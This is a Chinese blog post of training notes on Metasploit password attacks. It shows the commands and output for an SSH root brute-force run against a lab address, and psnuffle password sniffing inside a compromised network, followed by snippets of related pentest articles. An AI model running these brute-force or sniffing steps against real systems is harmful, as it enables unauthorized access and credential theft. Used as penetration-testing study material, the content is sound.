MSF魔鬼训练营-3.3.2 口令猜测与嗅探

密码暴力破解以SSH为例,其他协议方法类似

SSH

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.3.199

rhosts => 192.168.3.199

msf auxiliary(ssh_login) > set username root

username => root

msf auxiliary(ssh_login) > set pass_file /root/pass.txt

pass_file => /root/pass.txt

msf auxiliary(ssh_login) > set threads 100

threads => 100

msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce

[-] SSH - Failed: ‘root:19500101an‘

[-] SSH - Failed: ‘root:19500101ba‘

[-] SSH - Failed: ‘root:19500101bai‘

[-] SSH - Failed: ‘root:19500101ban‘

[-] SSH - Failed: ‘root:19500101bao‘

[-] SSH - Failed: ‘root:19500101bei‘

[-] SSH - Failed: ‘root:19500101bi‘

[-] SSH - Failed: ‘root:19500101bian‘


在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。

msf > use auxiliary/sniffer/psnuffle

msf auxiliary(psnuffle) > show options

Module options (auxiliary/sniffer/psnuffle):

Name       Current Setting  Required  Description

----       ---------------  --------  -----------

FILTER                      no        The filter string for capturing traffic

INTERFACE                   no        The name of the interface

PCAPFILE                    no        The name of the PCAP capture file to process

PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".

SNAPLEN    65535            yes       The number of bytes to capture

TIMEOUT    500              yes       The number of seconds to wait for new data

Auxiliary action:

Name     Description

----     -----------

Sniffer

msf auxiliary(psnuffle) > run

[*] Auxiliary module execution completed

msf auxiliary(psnuffle) >

[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...

[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...

[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...

[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...

[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...

[*] Sniffing traffic.....

时间: 2024-12-07 04:33:50

MSF魔鬼训练营-3.3.2 口令猜测与嗅探的相关文章

MSF魔鬼训练营-3.5.4Nmap与渗透测试数据库

MSF中可以直接使用db_nmap,它是namp的一个封装与NMAP用法完全一致.其执行结果会自动导入至数据库中. 当然也可以在使用 nmap 的 -oX参数输出一个XML格式的文件.这可以是你在本机扫描的结果,也可以是别人分享给你的. 然后在msf中使用db_import命令导入到数据库中. db_import能够识别多种扫描器的结果: Acunetix.Amap.Appscan.Burp Session.Microsoft Baseline Security Analyze.Nessus.N

MSF魔鬼训练营-3.5.3 MSF中常用的关于数据库的命令

渗透测试数据库用来保存渗透测试过程中获取的各种数据,很多时候你重启了kali发现连接不上数据库了,其实就是因为这个服务没开 MSF所使用的数据库时postgresql [email protected]:/# service postgresql start     开启postgresql数据库服务 [email protected]:/# msfdb init     如果你的msf无法成功连接数据库可以尝试使用初始化命令 A database appears to be already c

MSF魔鬼训练营-3.1.1信息收集-通过DNS和IP地址挖掘目标网络信息

情报搜集环境站渗透测试全过程的80%~90% 一.外围信息搜集(公开渠道信息搜集OSINT  open source intelligence) 3.1.1信息收集-通过DNS和IP地址挖掘目标网络信息 1.whois域名注册信息查询 whois查询时去掉www.ftp等前缀 2.nslookup与dig域名查询 nslookup与dig的区别 nslookup只会得到DNS解析服务器报错在Cache中的非权威解答. dig工具可以从该域名的官方DNS服务器商查询到精确的权威答案.?尝试查询了一

Metasploit渗透测试魔鬼训练营

首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想. 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思

2017-2018-2 20155303『网络对抗技术』Exp6:信息收集与漏洞扫描

2017-2018-2 20155303『网络对抗技术』 Exp6:信息收集与漏洞扫描 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.基础问题 二.实践过程记录 1.信息收集 1.1通过DNS和IP挖掘目标网站的信息 1.2通过搜索引擎进行信息搜集 1.3活跃主机扫描 1.4nmap的使用 1.5网络服务扫描 2.漏洞扫描 三.实践总结及体会 附:参考资料 一.原理与实践说明 1.实践内容 本实践的目标是掌握信息搜集的最基础技能.具体有: 各种搜索技巧的

2018-2019~7 20165107 网络对抗技术 Exp6 信息搜集与漏洞扫描

20165107 网络对抗技术 Exp6 信息搜集与漏洞扫描 实践目标 掌握信息搜集的最基础技能与常用工具的使用方法. 实践内容 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点 (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 基础问题解答 (1)哪些组织负责DNS,IP的管理. 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器.DNS和IP地址管理,它还设立了三个支持组织,

20155334 《网络攻防》 Exp6 信息搜集与漏洞扫描

20155334 Exp6 信息搜集与漏洞扫描 一.实验问题回答 哪些组织负责DNS,IP的管理? 答:互联网名称与数字地址分配机构 ICANN ,该机构决定了域名和IP地址的分配.负责协调管理DNS各技术要素以确保普遍可解析性,使所有的互联网用户都能够找到有效的地址.其下有三个支持机构,其中地址支持组织 ASO 负责IP地址系统的管理:域名支持组织 DNSO 负责互联网上的域名系统的管理. ICANN 是为承担域名系统管理,IP地址分配,协议参数配置,以及主服务器系统管理等职能而设立的非盈利机

Exp6 信息搜集与漏洞扫描 20164323段钊阳

20164323 Exp6 信息搜集与漏洞扫描 回答问题 1.哪些组织负责DNS,IP的管理. 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器.DNS和IP地址管理.全球一共有5个地区性注册机构:ARIN主要负责北美地区业务,RIPE主要负责欧洲地区业务,APNIC主要负责亚太地区业务,LACNIC主要负责拉丁美洲美洲业务,AfriNIC负责非洲地区业务. 2.什么是3R信息 官方注册局.注册商.注册人. 注册人(Registrant) 注册商(Registrar) 官

Exp 5 MSF基础应用

Exp 5 MSF基础应用 0x0 实验环境 本次实验的环境取自<Metasploit渗透测试魔鬼训练营>中的靶机镜像. 初始攻击点:Kali linux,IP地址:10.10.10.128 网关服务器:linux metasploitable(Ubuntu 8.04),IP地址:eth0(10.10.10.254),eth1(192.168.10.254) web服务器:OWASP BWA v0.94,IP地址:10.10.10.129 windows靶机1:windows xp SP3 E